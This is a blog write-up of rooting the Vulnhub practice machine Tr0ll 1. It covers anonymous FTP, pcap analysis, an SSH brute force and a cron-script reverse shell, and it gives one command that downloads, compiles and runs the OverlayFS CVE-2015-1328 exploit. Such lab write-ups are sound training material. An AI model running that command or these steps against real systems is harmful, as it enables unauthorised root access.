This post describe the necessary steps to gain root in Tr0ll 1 available on Vulnhub (https://www.vulnhub.com/). The goal for this box, according to the author Maleus (https://twitter.com/maleus21), is simple, gain root and get Proof.txt from the /root directory.
Machine Name: Tr0ll: 1
Resource URL: https://www.vulnhub.com/entry/tr0ll-1,100/
Release Data: 14 Aug 2014
Summary
To obtain administrative access in this box, the follow kill chain have been executed.
- Recon identified a ftp service with anonymous login enabled.
- Access the FTP Anonymous and download the lol.pcap file
- Searching for files, usernames, passwords, directories.
- Bruteforce Attack against SSH service.
- Crontab executes a script under root privileges, this script is writable, allowing the attacker to modify their content and get a root shell.
WriteUp
Recon
During the recon step, the attacker was able to enumerate ports and services in the target machine.
The nmap nse script ftp-anon.nse identified a Anonymous FTP login allowed in the target. The FTP is running at port 21/TCP under the service vsftpd 3.0.2. Inside the Anonymous account, the ftp-anon.nse report a pcap file called lol.pcap.
In order to access the FTP using the Anonymous account, the attacker use the FTP client to connect and inform the credentials where username is ‘Anonymous’ and password is some string in e-mail format, like ‘notareal@email.com’, without this, the FTP drop your authentication attempt.
The lol.pcap file was been submited to analysis in wireshark. The HTTP object secret_stuff.txt containt information about a directory called /sup3rs3cr3tdirlol/
A verification agains the directory /sup3rs3cr3tdirlol/ returns a valid directory with a file called roflmao inside.
The roflman was been submited to tests. Tests report that is a ELF-32 bit. Tests for strings return a hint inside the binary file “Find Address 0x0856BF to procceed“.
The new directory is located at 192.168.1.137/0x0856BF and returnss a Index Of with 2 directories.
Inside the good_lock directorie, a userlist has been found called which_one_lol.txt.
The wordlist from users was been edited to one line by username.
The password have been found at the directorie 192.168.1.137/0x0856BF/this_folder_contains_the_password. In the literal way, the password is the file name ‘Pass.txt‘.
Exploitation
In order to gain a foothold in the target system, a bruteforce attack was executed and return success. The user overflow has the password ‘Pass.txt’.
The credential allowed the attacker to connect in the target system using the SSH service under the overflow privileges.
Privilege Escalation: Part 1
Inside the target system, the verification for too much expensive permissions in files inside the filesystem return some scripts.
The content of /lib/log/cleaner.py file is edited to a malicious reverse shell. When the system execute the routine, a reverse shell is connect back to the attacker machine, allowing root access in the system.
Once the attacker is under root privilege, the flag can be read.
Privilege Escalation: Part 2
The script Linux Exploit Suggester (https://github.com/mzet-/linux-exploit-suggester) was been executed in the target system under the privielges from overflow user. The tool report the exploit OverlayFS (CVE-2015-1328)(https://www.exploit-db.com/exploits/37292) is high probable for sucess in local privilege escalation.
# Comand to download, compile and run the exploit https://www.exploit-db.com/raw/37292
wget https://www.exploit-db.com/raw/37292 -O /tmp/ofs.c && cd /tmp/ && gcc ofs.c -o ofs && ./ofs
Conclusion
The recon and enumeration steps really piss me off. This box is really CTF Like, not real world like.
Resources
- Overlayfs exploit: https://www.exploit-db.com/exploits/37292
- Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester
Computer Addicted 